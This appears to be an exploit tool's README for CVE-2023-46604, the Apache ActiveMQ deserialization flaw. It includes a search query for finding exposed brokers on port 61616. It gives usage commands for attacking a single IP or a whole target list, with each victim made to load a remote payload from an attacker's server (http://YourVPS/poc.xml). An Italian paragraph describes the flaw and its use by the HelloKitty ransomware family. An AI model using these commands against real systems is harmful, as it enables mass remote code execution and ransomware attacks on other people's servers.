
Exploit per CVE-2023-46604
Exploit per CVE-2023-46604
product:"ActiveMQ" port:"61616"
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
CVE-2023-46604 è una vulnerabilità critica di esecuzione remota di codice in Apache ActiveMQ, un software open-source di message broker. Questa vulnerabilità consente a un attaccante remoto con accesso di rete a un broker o a un client OpenWire basato su Java di eseguire comandi shell arbitrari. Ciò viene ottenuto manipolando i tipi di classe serializzati nel protocollo OpenWire, inducendo il broker a istanziare qualsiasi classe presente nel classpath. La vulnerabilità deriva da una deserializzazione non sicura all'interno di Apache ActiveMQ ed è stata sfruttata da attaccanti, tra cui la famiglia di ransomware HelloKitty, per eseguire binari ransomware e compromettere completamente i sistemi.